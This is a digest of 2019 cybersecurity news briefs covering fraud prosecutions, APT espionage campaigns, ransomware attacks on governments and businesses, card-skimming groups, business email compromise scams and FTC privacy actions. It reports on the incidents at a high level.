The US Department of Justice (DOJ) has exposed a major iPhone and iPad fraud ring operating out of California. The agency raided two businesses and several homes in Mira Mesa and Mission Hills, California, seizing over $250,000 in cash and 90 iPhones that may include counterfeit parts. Apparently, the operation revolved around acquiring counterfeit iPhone and iPads from China, importing them to the US, and then intentionally breaking those devices and having them replaced, under warranty, by Apple, with genuine iPhones and iPads. The legitimate units were then being returned to China for sale. The crime was allegedly perpetrated by three brothers, Zhiwei Loop Liao, Zhimin Liao, and Zhiting Liao, all of whom are considered fugitives at the time of writing. An additional 11 individuals have been charged in the case, which is believed to have moved more than 10,000 iPhones and iPads during its time in operation. According to the DOJ, it was able to escape detection for this long by acquiring legitimate IMEI (International Mobile Equipment Identity) numbers from real Apple products and applying them to the counterfeit devices before turning them in for replacement.Highly Targeted Campaign of 12 APT33 Botnets Evades Detection (11/13/2019)
The APT33 adversary has been tracked using about 12 command and control servers to highly target its attacks and implements multiple layers of obfuscation to avoid detection. Targeted campaigns were by Trend Micro's team of researchers targeting organizations in the Middle East, the US, and Asia. Among the active infections in 2019 are two separate locations for a private American company that offers services related to national security, victims connecting from a university and a college in the US, a victim most likely related to the US military, and several victims in the Middle East and Asia.Orcus Malware Author Charged in International Scheme (11/12/2019)
The Royal Canadian Mounted Police (RCMP) announced charges against John Paul Revesz from Toronto for allegedly operating an international malware scheme under the company name "Orcus Technologies." An RCMP criminal investigation began in July 2016 after reports of a significant amount of computers were being infected with a remote access Trojan. A search warrant was executed at the accused's residence in March 2019 and electronic devices were seized and later analyzed. The evidence obtained shows that this virus infected computers from around the world, victimizing thousands of people in multiple countries.Russian National Extradited for Allegedly Running Underground Credit Card Marketplace (11/12/2019)
A Russian national has been extradited to the US to face charges for running a criminal online marketplace that facilitated payment card fraud, computer hacking, and other crimes, the Justice Department (DOJ) announced. Aleksei Burkov allegedly ran a Web site called "Cardplanet" that sold payment card numbers that had been stolen primarily through computer intrusions. Many of the cards offered for sale belonged to US citizens. The stolen data from more than 150,000 compromised payment cards was allegedly sold on Burkov’s site and has resulted in over $20 million USD in fraudulent purchases made on US credit cards. Additionally, Burkov allegedly ran another online cybercrime forum that served as an invite-only club where elite cybercriminals could meet and post in a secure location to plan various cybercrimes, to buy and sell stolen goods and services.
Operator of Illegal Booter Services that Caused DDoS Attacks Receives Prison Term (11/19/2019)
The Justice Department (DOJ) announced that Sergiy P. Usatyuk of Orland Park, IL has been sentenced to 13 months in prison, followed by three years of supervised release on one count of conspiracy to cause damage to Internet-connected computers for his role in owning, administering, and supporting illegal booter services that launched millions of illegal distributed denial-of-service (DDoS) attacks against victim computer systems in the United States and elsewhere. According to the criminal information, Usatyuk combined with a co-conspirator to develop, control, and operate a number of booter services and booter-related Web sites from around August 2015 through November 2017 that launched millions of DDoS attacks that disrupted the Internet connections of targeted victim computers, rendered targeted Web sites slow or inaccessible, and interrupted normal business operations.Ransomware Attack Hits Louisiana State Government (11/19/2019)
Louisiana's state government was crippled by a ransomware attack that affected the Office of Motor Vehicles (OMV), the Department of Health, and the Department of Transportion and Development. The attack began on November 18 and resulted in the shuttering of various state Web sites. Some services were shutdown as a precautionary measure. According to Fox 8 News, business at all 79 OMV locations came to a halt. An official said that ransomware was to blame but that the state had not paid the ransom nor did it appear that any key data had been locked. Governor John Bel Edwards tweeted that he had mobilized the state's cybersecurity team to help disrupt the attack.Veterinary Hospital Company Targeted in Ryuk Ransomware Attack (11/19/2019)
Security researcher Brian Krebs learned that National Veterinary Associates (NVA), a company that owns over 700 animal care facilities around the globe, has been victimized by a ransomware attack that affected more than half of its practices. Although NVA declined to comment on the malware or whether it had paid the ransom, KrebsOnSecurity learned that the incident was discovered on October 27 and that two forensic firms were hired to investigate. An anonymous source told Krebs that the Ryuk ransomware was to blame and that an earlier ransomware attack, which occurred a few months prior, had also involved Ryuk. Approximately 400 NVA locations have been affected.
Customers' Payment Card Data Stolen from Hotels Around the World (12/02/2019)
More than 20 hotels in Latin America, Europe and Asia have fallen victim to targeted malware attacks conducted by several threat entities including RevengeHotels The campaign, which has been active since 2015 but has increased its presence since January, includes different groups using traditional remote access Trojans (RATs) to infect businesses in the hospitality sector. Research from Kaspersky shows that at least two groups, RevengeHotels and ProCC, were identified to be part of the campaign; however, more cybercriminal groups are potentially involved. The main attack vector includes emails with crafted malicious documents attached. Some of them exploit a bug in Windows, loading it using VBS and PowerShell scripts. It then installs customized versions of various RATs and other custom malware, such as ProCC, on the victim's machine that could later execute commands and set up remote access to the infected systems.Elaborate Man-in-the-Middle Attack Involves Email Correspondence, Results in $1M Loss (12/05/2019)
Check Point Software uncovered an elaborate business email compromise scheme that involved an entity using highly sophisticated tactics - including email communications - to trick both parties and steal $1 million USD. The case involves two legitimate companies - a Chinese venture capital fund and an Israeli startup - and a wire transfer. After realizing the theft, the startup tapped Check Point for help. Upon analysis, Check Point determined that the attacker had spotted the correspondence between the two companies ahead of the anticipated wire transfer and set up two lookalike domains to resemble the legitimate companies. The attacker then began corresponding with both the venture capital fund and the startup, spoofing the email addresses of each company. Check Point's Matan Ben David said, "This infrastructure gave the attacker the ability to conduct the ultimate Man-In-The-Middle (MITM) attack. Every email sent by each side was in reality sent to the attacker, who then reviewed the email, decided if any content needed to be edited, and then forwarded the email from the relevant lookalike domain to its original destination."Europol Seizes Insidious IM-RAT that Took Complete Control of Machines (12/02/2019)
A hacking tool that was able to give full remote control of a victim's computer to cybercriminals has been taken down as a result of an international law enforcement operation targeting the sellers and users of the Imminent Monitor Remote Access Trojan (IM-RAT). The investigation, led by the Australian Federal Police (AFP), with international activity coordinated by Europol and Eurojust, resulted in an operation involving numerous judicial and law enforcement agencies. The tool had been used across 124 countries and sold to over 14,000 buyers but it can no longer be used by anyone who purchased it. The IM-RAT once installed undetected, gave cybercriminals free rein to the victim's machine. It sold for as little as $25 USD.Four Million Payment Cards from Breached Restaurants Selling in Hacker Marketplace (11/26/2019)
KrebsOnSecurity reported that four million payment cards gleaned from a breach of four restaurant chains are for sale on the Joker's Stash, a cybercriminal underground market. Two financial industry sources told researcher Brian Krebs that the payment cards had all been used at Krystal, Moe's, McAlister's Deli, and Schlotsky's. Krystal confirmed in October that it had been breached while the other restaurants are all part of the same parent company and announced breaches in August.Magecart Splinter Group Uses Phishing and Skimming to Lift Payment Card Data (11/27/2019)
A group affiliated with the Magecart attacks has jumped from phishing to card skimming. The group, dubbed "Fullz House," sells packages of individuals' identifying information (known as "fullz") on its BlueMagicStore site. The group also uses skimming to sell payment card information on its carding store called CardHouse. Fullz House isn't new to the cybercriminal world but it ramped up its activities beginning in August-September. While the two parts of this group's operation are mainly split, there is a slight overlap in its attack infrastructure on domain-to-IP address resolution data. The sales platforms this group operates also have infrastructure overlap with the infrastructure tied to the group's operations that steal cards or payment credentials. RiskIQ has published its analysis of Fullz House. Magecart is not a specific entity but a bunch of splinter groups that all use the same tactics to compromise ecommerce sites and inject scripts to steal payment card data.Magecart Threat Group Injects Skimmers onto Salesforce's Cloud Platform (12/05/2019)
Malwarebytes spotted a number of skimmers found on Heroku, a container-based, cloud Platform as a Service that is owned by Salesforce. Magecart threat actors are leveraging the service to host their skimmer infrastructure and collect stolen credit card data. Developers can use Heroku to build apps in a variety of languages and deploy them seamlessly at scale. The Magecart thieves were registering free accounts with Heroku to host their skimming business. After notifying Salesforce of the Magecart activity, the instances were removed.NEC Concludes Agreement with INTERPOL (11/25/2019)
NEC has concluded a global cybersecurity agreement with the International Criminal Police Organization (INTERPOL). This partnership replaces an existing agreement by combining INTERPOL's international network with NEC cybersecurity technology to "assist the investigation and analysis of complex and sophisticated cybercrime" in addition to "strengthening security at an international level."Operation ENDTRADE Improves Malware Features to Steal Classified Data (12/02/2019)
The TICK (also known as BRONZE BUTLER AND REDBALDKNIGHT) threat group has increased its malware development deployments since November 2018. TICK, which has been active since 2008, developing new malware families capable of detection evasion for initial intrusion, as well as escalation of administrative privileges for subsequent attacks and data collection. The group is using legitimate email accounts and credentials for the delivery of the malware, zeroing in on industries with highly classified information: defense, aerospace, chemical, and satellite industries with head offices in Japan and subsidiaries in China. Trend Micro is calling this campaign "Operation ENDTRADE." Further details are available from a white paper published by the vendor.Scammers Posing as CISA Reps to Extort Money from Victims (12/02/2019)
The Cybersecurity and Infrastructure Security Agency (CISA) is aware of a phone scam where a caller pretends to be a CISA representative. The scammer claims to have knowledge of the potential victim's questionable behavior and attempts to extort money. CISA advises anyone who receives such a call not to pay any money and to contact a local FBI field office to file a report.
Microsoft announced that its AccountGuard cyber threat detection service, which launched in August 2018, has identified 781 nation-state attacks taking aim at organizations using the service. Ninety-five percent of these attacks have targeted US-based organizations. Many of the attacks were aimed at think tanks and non-governmental organizations that work closely with political parties and election candidates. Microsoft did not elaborate on if any of the attacks were successful.
The Dutch National Police Unit arrested a Dutch resident suspected of the large-scale production and selling of malware, including Rubella, Cetan and Dryad. The suspect was active in hackers' forums under various names and eventually was tracked down. He is alleged to have created and sold the Rubella Macro Builder toolkit which is used to weaponize Office documents to deliver malicious payloads. McAfee spotted Rubella in the wild and aided in this investigation.
While the operators of the GandCrab ransomware announced they were shuttering their malicious business in June, security researcher Brian Krebs suspects that the threat actors behind it may have reemerged with a new ransomware. KrebsOnSecurity reported that the GandCrab team is most likely behind a program called REvil (also known as Sodin and Sodinokibi). Cisco identified Sodinokibi, which was used to deploy GandCrab while a Dutch firm noticed similarities in how GandCrab and REvil generate URLs within the infection process. Krebs said in a blog post, "My guess is the GandCrab team has not retired, and has simply regrouped and re-branded due to the significant amount of attention from security researchers and law enforcement investigators. It seems highly unlikely that such a successful group of cybercriminals would just walk away from such an insanely profitable enterprise."
A malware framework is responsible for more than one billion fraudulent ad impressions since April, generating its operators significant Google AdSense revenue on a monthly basis. Flashpoint researchers uncovered the framework, which features three separate stages that ultimately install a malicious browser extension designed to perform fraudulent AdSense impressions, as well as generate likes on YouTube videos and watch hidden Twitch streams. The framework is designed to pad statistics on social sites and ad impressions, creating revenue for its operators who are using a botnet to attack the content and advertising platforms by spreading the malware and targeting browsers including Google Chrome, Mozilla Firefox, and Yandex's browser.
AlienVault has identified an ongoing malware campaign, attributable to the StrongPity (also known as PROMETHIUM) adversary, that began in the second half of 2018. The malware samples appear to have been created and deployed to targets following a toolset rebuild in response to various security vendors reporting on StrongPity's tactics in 2018. One sample is a malicious installer for WinBox, a utility that allows administration of the Mikrotik Router operating system using a simple GUI. Other installers are also being used, including newer versions of WinRAR and a tool called Internet Download Manager which maliciously installs StrongPity and communicates with related adversary infrastructure.
A threat actor dubbed "SWEED" by Cisco's Talos researchers is pushing multiple campaigns that use Formbook, Lokibot, and Agent Tesla malware. SWEED has been in operation since at least 2017 and primarily targets victims with stealers and remote access Trojans. The threat actor has used various techniques to infiltrate its victims, but beginning in 2019, SWEED began leveraging malicious Office macros and using different methods to bypass User Account Control on systems. It is targeting small and medium-sized companies in manufacturing and logistics around the world.
An advisory issued by the UK's National Cyber Security Center highlights Domain Name System hijacking activity and offers remediation methods. According to the advisory, multiple regions and sectors have been victimized by these incidents.
FireEye identified a phishing campaign conducted by APT34, an Iranian threat actor posing as a member of Cambridge University to gain victims' trust to open malicious documents. The campaign used LinkedIn to deliver the malicious documents and organizations in energy/utilities, government, and oil/gas were the targets. APT34 (also known as OilRig and Greenbug) uses a mix of public and non-public tools to collect strategic information that would benefit nation-state interests pertaining to geopolitical and economic needs. FireEye also identified a variant of the Pickpocket browser credential-stealing tool and two new malware families, VALUEVAULT and LONGWATCH, in use by this campaign.
The Department of Education issued an advisory regarding the active and ongoing exploitation of a previously identified vulnerability in the Ellucian Banner system. Attackers can leverage the bug to the Banner system with an institutional account. The department has identified 62 colleges or universities that have been affected by exploitation of this vulnerability. Additionally, there is information "that indicates criminal elements have been actively scanning the Internet looking for institutions to victimize through this vulnerability and developing lists of institutions for targeting with this exploitation. Banner is an administrative software system designed for higher education institutions. Security researcher Joshua Mulliken detailed the bug in a December 2018 advisory.
Researchers at Wordfence warn of a malvertising campaign which is causing victims' sites to display unwanted popup ads and redirect visitors to malicious destinations, including tech support scams, malicious Android APKs, and sketchy pharmaceutical ads. By exploiting WordPress vulnerabilities, the attackers inject a JavaScript payload into the front end of a victim's site. These injections each contain a short script which sources additional code from one or more third-party URLs. That code is executed when a visitor opens the victim Web site. When the third party code executes in a visitor's browser, it performs an initial redirect to a central domain, which then performs another redirect to a new destination based on a number of factors, notably the type of device in use by the redirected user.
Louisiana's governor declared a state of emergency on July 24 due to an ongoing cyber attack that has affected several school districts in the northern part of the state. The Governor's Office of Homeland Security and Emergency Preparedness activated its crisis action team and also the Emergency Services Function-17 to coordinate the response to this cybersecurity incident, which included the FBI and state agencies. Governor John Bel Edwards said, "The state was made aware of a malware attack on a few north Louisiana school systems and we have been coordinating a response ever since,"
The Federal Trade Commission (FTC) has imposed a $5 billion USD fine and new restrictions on Facebook as punishment for violating consumers' privacy. The settlement order imposes restrictions on Facebook's business operations, creates multiple channels of compliance, and requires Facebook to restructure its approach to privacy. The social media giant must establish strong mechanisms to ensure that Facebook executives are accountable for the decisions they make about privacy, and that those decisions are subject to meaningful oversight. To encourage users to share information on its platform, Facebook promises users they can control the privacy of their information through the platform's privacy settings. Following a year-long investigation, the FTC found that Facebook repeatedly used deceptive practices to undermine users' privacy preferences. These tactics allowed the company to share users' personal information with third-party apps that were downloaded by the user's Facebook "friends." The FTC alleges that many users were unaware that Facebook was sharing such information, and therefore did not take the steps needed to opt-out of sharing. "Despite repeated promises to its billions of users worldwide that they could control how their personal information is shared, Facebook undermined consumers' choices," said FTC Chairman Joe Simons. "The magnitude of the $5 billion penalty and sweeping conduct relief are unprecedented in the history of the FTC. The relief is designed not only to punish future violations but, more importantly, to change Facebook's entire privacy culture to decrease the likelihood of continued violations." The $5 billion penalty is the largest ever imposed on any company for violating consumers' privacy.
Former National Security Agency (NSA) contractor Harold Martin has been sentenced to nine years in prison for stealing highly classified national defense information for almost 20 years, the Justice Department (DOJ) announced. Beginning in the late 1990s and continuing through August 2016, Martin stole and retained government property from secure locations and computer systems, including documents in both hard copy and digital form relating to national defense.
The Federal Trade Commission (FTC) filed an administrative complaint against data analytics company Cambridge Analytica, and filed settlements for public comment with Cambridge Analytica's former chief executive and an app developer who worked with the company, alleging they employed deceptive tactics to harvest personal information from tens of millions of Facebook users for voter profiling and targeting. The FTC alleges that Cambridge Analytica and two defendants, app developer Aleksandr Kogan and former Cambridge Analytica CEO Alexander Nix, deceived consumers by falsely claiming they did not collect any personally identifiable information from Facebook users who were asked to answer survey questions and share some of their Facebook profile data. Kogan is the developer of the GSRApp that was utilized by Facebook users to answer personality-type questions. Kogan, Nix, and Cambridge Analytica used and analyzed the data collected from the app to train an algorithm to generate personality scores for the app users and their Facebook friends. Those personality scores were then matched to US voter records and used by Cambridge Analytica for voter profiling and targeted advertising services. GSRApp told users it would not download any identifiable information - only demographic data - but the FTC has said that those claims were false and the app collected Facebook User IDs, which connects individuals to their Facebook profiles, as well as other personal information such as their gender, birthdate, location, and their Facebook friends list.
Cofense has observed a wave of phishing attacks that utilize the legitimate file hosting site WeTransfer to deliver malicious URLs to bypass email gateways. The attacks span major industries like banking, power, and media. The attackers are using what appears to be compromised email accounts to send a genuine link to a WeTransfer hosted file. As these are legitimate links from WeTransfer, this allows them to travel straight through security checks at the gateway.
Imperva mitigated a massive distributed denial-of-service attack that peaked at 292,000 packets per second and used 402,000 compromised devices. The attack, sourced back to Brazil, lasted 13 days and hit an Imperva client in the entertainment industry. The attackers used a legitimate User-Agent, the same as used by the entertainment industry customer service application, to mask the attack which targeted the authentication component of the client's streaming application. Upon analysis, the devices used in the attack all had the same open ports which showed their association with the Mirai malware.
Elasticsearch is being abused by turning affected targets into botnet zombies used in distributed denial-of-service (DDoS) attacks. The attack chain involves searching for exposed or publicly accessible Elasticsearch databases/servers. The malware would invoke a shell with an attacker-crafted search query with encoded Java commands. Once this is successfully carried out, the first malicious script is downloaded from a domain, which, in Trend Micro's analysis, appears to be expendable or easy-to-replace. The first-stage script will attempt to shut down the firewall as well as competing and already-running cryptocurrency mining activities and other processes. The second-stage script is then retrieved, likely from a compromised Web site. Using expendable domains allows the attackers to swap URLs as soon as they are detected.
Proofpoint researchers identified a targeted advanced persistent threat (APT) campaign that utilized malicious RTF documents to deliver custom malware to unsuspecting victims. The campaign, dubbed "Operation LagTime IT," uses spear phishing as its attack vector and a Microsoft Equation Editor zero-day bug to deliver a custom malware called Cotx RAT. Additionally, this APT group implements Poison Ivy payloads that share overlapping command and control infrastructure with the Cotx campaigns. Based on infrastructure overlaps, post-exploitation techniques, and historic tools used in this operation, Proofpoint analysts attribute this activity to the Chinese APT group known as TA428. The group has targeted government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes.
KrebsOnSecurity reported that iNSYNQ, a cloud hosting provider, was hit by a ransomware attack that left its network inaccessible and customers unable to reach their data. iNSYNQ specializes in delivering cloud-based QuickBooks accounting software and services. In a statement, the company said, "The attack impacted data belonging to certain iNSYNQ clients, rendering such data inaccessible. As soon as iNSYNQ discovered the attack, iNSYNQ took steps to contain it. This included turning off some servers in the iNSYNQ environment." CEO Elliot Luchansky said in a separate statement on July 22, "iNSYNQ and our customers were the victims of a malware attack that's a totally new variant that hadn't been detected before, confirmed by the experienced and knowledgeable cybersecurity team we've employed."
According to Symantec telemetry, the average daily volume of business email compromise (BEC) messages was significantly higher in the first quarter of 2019 than in the same period one year ago. From January to March 2018, the average daily BEC email volume was 85,816, while from January to March 2019, the average daily volume was 128,700, a 50% increase. The top five nations targeted by BEC scammers between mid-2018 and mid-2019 were as follows: the US (39%), the UK (26%), Australia (11%), Belgium (3%), and Germany (3%),
Three Romanian citizens - Teodor Laurentiu Costea, Robert Codrut Dumitrescu, and Cosmin Draghici - have been sentenced to federal prison on wire fraud conspiracy, computer fraud and abuse, and aggravated identity theft charges, the Justice Department (DOJ) announced. The "vishing" and "smishing" schemes resulted in the illegal intrusion into computer servers in the US. The men also deployed phishing messages to thousands of victims and subsequently stole victims' Social Security numbers and bank account information. Losses totaled over $21 million USD. Vishing is a type of phishing scheme that communicates a phishing message, or a message that purports to be from a legitimate source, in this case the victims' banks, through a voice recording. Smishing is similar but communicates a phishing message through text messages.
While investigating several ransomware incidents, Synology determined that the causes of these attacks were due to dictionary attacks instead of specific system vulnerabilities. This large-scale attack was targeted at various NAS (network attached storage) models from different vendors, including Synology. In each incident, admins' credentials were stolen by brute-force login attacks, and their data was encrypted. Synology's team strongly recommends users check network and account settings to protect data.
A North Carolina county paid more than $2.5 million USD to a scammer after falling victim to a business email compromise (BEC) scheme that began in November 2018. Cabarrus County officials released details of the scam that diverted a $2,504,601 vendor payment made by the county. Officials have retrieved some of the funds, but more than $1.7 million remains missing. Conspirators posed as representatives of the contracting firm that was to construct a new high school and targeted employees working for the county government by using BEC tactics.
Cisco agreed to settle a case for $8.6 million USD after a whistleblower accused the company of knowingly selling flawed video surveillance software to the US government and other customers, ZDNet reported. The case was handled by the False Claims Act and the suit was filed in May 2011 but was not made public until July 31. James Glenn, a Cisco subcontractor who worked at NetDesign in Denmark, said he discovered security holes in the vendor's Video Surveillance Manager (VSM) and notified Cisco in October 2008. The flaws could have enabled attackers to take control of video surveillance cameras and potentially gain access to networks. Cisco did not fix the vulnerabilities and continued to sell the VSM package to customers, including the US government. When Cisco failed to act, Glenn filed a whistleblower case and 18 states joined in. Cisco patched the bugs in 2013 and retired the VSM package a year later.
The Cobalt Group cybercriminal actor has taken aim at a bank in Kazakhstan with a decoy document that Check Point Software researchers say may have been lifted from the bank's actual Web site. The malicious file was hosted among the documents repository of the bank, which makes it easy to confuse with a legitimate document. Once downloaded and launched, the fake document uses socially-engineered content to trick victims into running the embedded malicious macros.
In a statement posted online, the Georgia In a statement posted online, the Georgia Department of Public Safety's (DPS) announced that its network servers were offline due to a ransomware attack. Government Technology reported that the incident was first observed on July 26 when certain network services and communication systems were disrupted. DPS Chief Technology Officer Steve Nichols said that once the incident was discovered, employees worked to take all servers offline. The Ryuk ransomware was responsible for the attack. 's (DPS) announced that its network servers were offline due to a ransomware attack. Government Technology reported that the attack became apparent on July 26 when certain network services and communication systems were disrupted. DPS Chief Technology Officer Steve Nichols said that once the incident was discovered, employees worked to take all servers offline. The Ryuk ransomware is to blame for the attack.
Dragos identified a new activity group targeting industrial control systems (ICS). HEXANE is targeting oil and gas companies in the Middle East, including Kuwait, as a primary operating region and telecommunication providers in the greater Middle East, Central Asia, and Africa. HEXANE intrusion activity includes malicious documents that drop malware to establish footholds for follow-on activity. The group became operational in mid-2018 but its activity has intensified since early 2019. HEXANE demonstrates similarities to the activity groups MAGNALLIUM and CHRYSENE; all are ICS-targeting activities focusing largely on oil and gas, and some of the behaviors and recently observed tactics, techniques, and procedures are similar. Dragos noted that MAGNALLIUM also has accelerated its activity and has been targeting US government and financial organizations as well as oil and gas companies.
Silk Road operator Gary Davis has been sentenced to a 78 month prison term for his role as a member of the cybercriminal marketplace, the Justice Department (DOJ) announced. During its operation from 2011 until 2013, Silk Road was used by thousands of drug dealers and other unlawful vendors to distribute over $200 million USD worth of illegal drugs and other illicit goods and services to more than 115,000 buyers, and to launder hundreds of millions of dollars derived from those unlawful transactions. Davis worked as a forum moderator and a site administrator for Silk Road and also as an administrator for its next implementation, Silk Road 2.0.
Symantec announced that its technologies blocked 289 million extortion scam emails between January 1 and May 29 - 85 million (nearly 30%) of those messages were blocked in one 17-day period alone. It is not clear which threat actors are behind these scams.
A tactic dubbed "warshipping" by IBM's X-Force Red team of researchers involves the use of ecommerce-related package deliveries by cyber thieves with the intention of hacking into corporate or personal home networks from the office mailroom or from someone's front door. By using warshipping, the scientists could infiltrate a network without being detected. Warshipping involves the use of disposable, low-cost, and low-power computers to remotely perform close-proximity attacks, regardless of a cybercriminal's location. A malicious actor can hide a tiny device (similar to the size of a small cellphone) in a package and ship it off to his or her victim to gain access to a specific network. The device, a 3G-enabled, remotely controlled system, can be tucked into the bottom of a packaging box or stuffed inside an item as it is no bigger than the palm of a hand.
The Australian Cyber Security Center (ACSC) is aware of a high volume of ongoing password spray attacks targeting Australian organizations. The password spray attacks target users on standard corporate external services such as Webmail, remote desktop access, Active Directory Federated Services, or cloud based services such as Office 365. Depending on the credentials and service, successful authentication can potentially lead to the actor gaining access to corporate emails, the corporate directory, global address books, remote desktop services or administrative access. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the ACSC advisory.
FireEye has detailed its research into APT41, a Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain and has been conducting simultaneous cybercrime and cyber espionage operations from 2014 onward. This entity has an arsenal of over 46 different malware families and tools to accomplish its missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. In one campaign that ran for nearly a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware, including backdoors, credential stealers, keyloggers, and rootkits.
The Internet Crime Complaint Center (IC3) posted a warning regarding an increase in confidence/romance scams in which an actor deceives a victim into believing they have a trust relationship and uses that relationship to persuade the victim to send money, provide personal and financial information, purchase items of value for the actor, or even launder money. In 2018, the IC3 received complaints from more than 18,000 individuals who had been victimized by these scams and more than $362 million USD was reported stolen. That year, confidence/romance fraud was the seventh most commonly reported scam to the IC3 based on the number of complaints received, and the second costliest scam in terms of victim loss. Tips to protect against such scams are listed in the IC3 alert.
Scientists at Carbon Black identified a cryptocurrency mining campaign, "Access Mining," which has been enhanced to steal system access information for possible sale on the dark Web. This campaign potentially affects over 500,000 systems worldwide but most have been located in located in Asia Pacific, Russia and Eastern Europe.. Access Mining uses multi-stage malware that sends detailed system metadata to a network of hijacked Web servers, presumably for the purposes of resale on one (or many) remote access marketplaces across the dark Web.
The US Department of Justice (DOJ) uncovered a strange case of fraud and "misuse" of AT&T's network centered around the unlocking of smartphones on the company's network. The crime was perpetrated by Pakistani citizen Muhammad Fahd, who bribed staff at a Bothell, Washington AT&T call center in order to have carrier-locked smartphones unlocked from the AT&T network before the company's policy would normally allow it. While this act is already considered criminal, the much more concerning aspect of the incident may be the fact that Fahd also paid AT&T staff to insert malware and "otherwise misuse" the AT&T network for his personal gain. In exchange for facilitating his criminal activity, the participating workers at the call center were bribed to the tune of $428,500 over a five-year period. The numerous charges against Fahd include wire fraud, five charges incidents of Travel Act violations, conspiracy to violate the Computer Fraud and Abuse act, and four counts linked of accessing and damaging protected computers. The DOJ claims the fraud ring unlocked "millions of devices," allowing its ringleader to abuse the early unlocking procedure to make millions of dollars in the process.
The Cybersecurity and Infrastructure Security Agency (CISA) advises businesses and consumers to be vigilant for possible malicious cyber activity seeking to capitalize on the tragic events in El Paso, TX and Dayton, OH. Fraudulent email campaigns are possible after the two mass shootings as some scammers will champion donations for charitable causes, yet use the opportunity to spread malware and siphon money from unsuspecting parties.
Two hackers are attempting to text every mobile phone in the US using SMS gateways, a legitimate technology often utilized by businesses to mass-text users, Wired has reported. The hackers, known by their Twitter handles as @j3ws3r and @0xGiraffe, created a script and generated every possible phone number between 1111111 and 9999999 and then connected them to a list of US area codes. Although many of the messages were filtered out by US carriers, some still got through to cell phone users. "I'm here to warn the masses about SMS email gateways. Please look up how to disable it on your phone or call your provider and ask," was the message spammed out by @j3ws3r.
In the second half of 2019, Kaspersky researchers observed activity in the Middle East including a series of online asset leaks such as code, infrastructure, group, and apparent victim details, allegedly belonging to known Persian-speaking threat actors, OilRig and MuddyWater. Though these leaks originated from different sources, they all appeared within a few weeks of each other. The third online leak, which was said to expose information related to an entity called the "RANA institute," was published in Persian on a Web site called "Hidden Reality." Kaspersky researchers' analysis of the materials, infrastructure, and the dedicated Web site led to the conclusion that this particular leak could be connected to the threat actor Hades. Hades is the cyber threat group behind the OlympicDestroyer incident targeting the 2018 Winter Olympic Games, as well as the ExPetr worm and other disinformation campaigns. Further details about these infiltrations can be gleaned from Kaspersky's quarterly advanced persistent threats summary.
Between July 19 and July 25, several spear phishing emails were identified targeting three US companies in the utilities sector. The phishing emails appeared to impersonate a US-based engineering licensing board with emails originating from what appears to be an actor-controlled domain, nceess[.]com. This URL is believed to be an impersonation of a domain owned by the US National Council of Examiners for Engineering and Surveying. The emails contain a malicious Word attachment that uses macros to install and run malware that Proofpoint researchers have dubbed "LookBack." This malware consists of a remote access Trojan module and a proxy mechanism used for command and control communication. LookBack appears to be the work of a nation-state actor that is targeting utilities systems and critical infrastructure providers.
Palo Alto Networks released details about Rocke, a China-based cybercrime group engaged in cryptomining operations targeting the cloud. By analyzing NetFlow data between December 2018 and June, the researchers found that 28.1% of the cloud environments surveyed had at least one fully established network connection with at least one known Rocke command and control domain. Several of those organizations maintained near daily connections. Meanwhile, 20% of the organizations maintained hourly heartbeats consistent with Rocke tactics, techniques, and procedures. Rocke also released a new backdoor called Godlua, which could function as an agent, allowing the group's actors to perform additional scripted operations, including denial-of-service attacks, network proxying, and two shell capabilities. NetFlow is a capability on Cisco routers that allows for the collection of IP network traffic.
Kaspersky researchers have identified a global, emerging trend in spam and phishing delivery techniques. Cybercriminals are increasingly exploiting registration, subscription, and feedback forms on trusted company Web sites to insert spam content or phishing links into confirmation emails. The goal of such campaigns is to have emails originate from a legitimate, reputable source so that users do not ignore the unwanted email. The spam messages appear to come from a legitimate company.
Microsoft researchers discovered infrastructure from STRONTIUM (also known as Sednit, APT28, Pawn Storm, and Fancy Bear) attempting to compromise Internet of Things (IoT) devices, including a voice over IP phone, an office printer, and a video decoder across multiple customer locations. The investigation showed that the threat actor had used these devices to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer's passwords, and in the third instance the latest security update had not been applied to the device. After gaining access to each of the IoT devices, the actor ran tcpdump to sniff network traffic on local subnets and enumerated administrative groups for further exploitative purposes. As the actor moved from one device to another, they would drop a simple shell script to establish persistence on the network which allowed extended access to continue hunting.
Cybersecurity research firm CipherTrace found that cryptocurrency theft is on the rise, despite increased security measures by many sites and exchanges. According to the site's research, "cybercriminals looted $125 million in Bitcoin, Ethereum and other digital assets from exchanges in Q2 2019." The site pointed to the so-called "exit scam" as the greatest rising threat, with it claiming that more than $3.1 billion may have been stolen via this attack vector, which relies on currency exchange.
A new investigation published by The Wall Street Journal claims that engineers from Chinese smartphone and networks hardware maker Huawei helped certain African governments spy on their political rivals' telecom networks. Specifically, the article's sources claim the company helped authorities in Uganda intercept encrypted messages and allowed police in Zambia to locate opposition bloggers. Huawei's alleged participation ranged from the provision of Israeli malware to tapping phones and illegally accessing political opponents' Facebook pages. Perhaps surprisingly, both governments readily confirmed that they are working with Huawei, but both framed their efforts as combating "fake news," rather than suppressing communications from sources with views that differ from their own.
Kaspersky Lab has published a new study in which it reported that 52 percent of OT/ICS (operational technology and industrial control system) networks incidents were due to "employee errors" or "unintentional actions." The State of Industrial Cybersecurity 2019 report found this issue to primarily be the result of the growing complexity of industrial infrastructure, as well as a general shortage of professionals who understand how to detect new threats.
The cities of Borger and Keene, Texas became two of the latest municipalities to fall victim to a ransomware attack, Sophos reported. In total, 22 departments within the two local governments were affected by the attack. Apparently the attackers demanded $2.5 million to restore the government's access to its systems. The state believes a single threat actor was the culprit for the entire incident, and that the attack was routed through a software provider used by all of the affected departments. The impacted cities were still in the process of attempting to recover their systems at the time of writing. No ransom was paid out.
